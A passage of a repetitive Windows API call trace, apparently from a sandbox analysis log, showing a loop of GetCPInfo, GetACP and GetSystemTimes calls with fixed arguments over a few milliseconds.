CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.562] GetACP () returned 0x4e4 [0178.562] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.562] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.562] GetACP () returned 0x4e4 [0178.562] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.562] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.562] GetACP () returned 0x4e4 [0178.562] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.562] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.562] GetACP () returned 0x4e4 [0178.563] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.563] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.563] GetACP () returned 0x4e4 [0178.563] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.563] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.563] GetACP () returned 0x4e4 [0178.563] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.563] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.563] GetACP () returned 0x4e4 [0178.563] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.563] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.563] GetACP () returned 0x4e4 [0178.563] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.564] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.564] GetACP () returned 0x4e4 [0178.564] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.564] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.564] GetACP () returned 0x4e4 [0178.564] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.564] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.564] GetACP () returned 0x4e4 [0178.564] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.564] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.564] GetACP () returned 0x4e4 [0178.564] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.565] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.565] GetACP () returned 0x4e4 [0178.565] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.565] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.565] GetACP () returned 0x4e4 [0178.565] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.565] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.565] GetACP () returned 0x4e4 [0178.565] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.565] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.565] GetACP () returned 0x4e4 [0178.565] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.565] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.566] GetACP () returned 0x4e4 [0178.566] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.566] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.566] GetACP () returned 0x4e4 [0178.566] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.566] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.566] GetACP () returned 0x4e4 [0178.566] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.566] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.566] GetACP () returned 0x4e4 [0178.566] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.566] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.566] GetACP () returned 0x4e4 [0178.566] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.567] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.567] GetACP () returned 0x4e4 [0178.567] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.567] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.567] GetACP () returned 0x4e4 [0178.567] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.567] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.567] GetACP () returned 0x4e4 [0178.567] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.567] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.567] GetACP () returned 0x4e4 [0178.567] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.567] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.567] GetACP () returned 0x4e4 [0178.567] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.568] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.568] GetACP () returned 0x4e4 [0178.568] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.568] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.568] GetACP () returned 0x4e4 [0178.568] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.568] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.568] GetACP () returned 0x4e4 [0178.568] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.568] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.568] GetACP () returned 0x4e4 [0178.568] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.569] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.569] GetACP () returned 0x4e4 [0178.569] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.569] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.569] GetACP () returned 0x4e4 [0178.569] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.569] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.569] GetACP () returned 0x4e4 [0178.569] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.569] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.569] GetACP () returned 0x4e4 [0178.569] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.569] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.569] GetACP () returned 0x4e4 [0178.569] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.569] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.569] GetACP () returned 0x4e4 [0178.569] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.570] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.570] GetACP () returned 0x4e4 [0178.570] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.570] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.570] GetACP () returned 0x4e4 [0178.570] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.570] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.570] GetACP () returned 0x4e4 [0178.570] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.570] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.570] GetACP () returned 0x4e4 [0178.570] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.570] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.570] GetACP () returned 0x4e4 [0178.570] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.570] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.570] GetACP () returned 0x4e4 [0178.571] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.571] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.571] GetACP () returned 0x4e4 [0178.571] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.571] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.571] GetACP () returned 0x4e4 [0178.571] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.571] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.571] GetACP () returned 0x4e4 [0178.571] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.571] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.571] GetACP () returned 0x4e4 [0178.571] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.571] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.571] GetACP () returned 0x4e4 [0178.571] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.572] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.572] GetACP () returned 0x4e4 [0178.572] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.572] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.572] GetACP () returned 0x4e4 [0178.572] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.572] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.572] GetACP () returned 0x4e4 [0178.572] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.572] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.572] GetACP () returned 0x4e4 [0178.572] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.572] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.572] GetACP () returned 0x4e4 [0178.572] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.572] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.573] GetACP () returned 0x4e4 [0178.573] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.573] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.573] GetACP () returned 0x4e4 [0178.573] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.573] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.573] GetACP () returned 0x4e4 [0178.573] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.573] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.573] GetACP () returned 0x4e4 [0178.573] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.573] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.573] GetACP () returned 0x4e4 [0178.573] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.573] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.573] GetACP () returned 0x4e4 [0178.573] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.574] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.574] GetACP () returned 0x4e4 [0178.574] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.574] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.574] GetACP () returned 0x4e4 [0178.574] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.574] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.574] GetACP () returned 0x4e4 [0178.574] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.574] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.574] GetACP () returned 0x4e4 [0178.574] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.574] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.574] GetACP () returned 0x4e4 [0178.574] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.574] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.575] GetACP () returned 0x4e4 [0178.575] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.575] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.575] GetACP () returned 0x4e4 [0178.575] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.575] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.575] GetACP () returned 0x4e4 [0178.575] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.575] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.575] GetACP () returned 0x4e4 [0178.575] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.575] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.575] GetACP () returned 0x4e4 [0178.575] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.575] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.575] GetACP () returned 0x4e4 [0178.575] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.576] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.576] GetACP () returned 0x4e4 [0178.576] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.576] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.576] GetACP () returned 0x4e4 [0178.576] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.576] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.576] GetACP () returned 0x4e4 [0178.576] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.576] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.576] GetACP () returned 0x4e4 [0178.576] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.576] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.576] GetACP () returned 0x4e4 [0178.576] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.576] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.576] GetACP () returned 0x4e4 [0178.577] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0178.577] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0178.577] GetACP () returned 0x4e4 [0178.577] 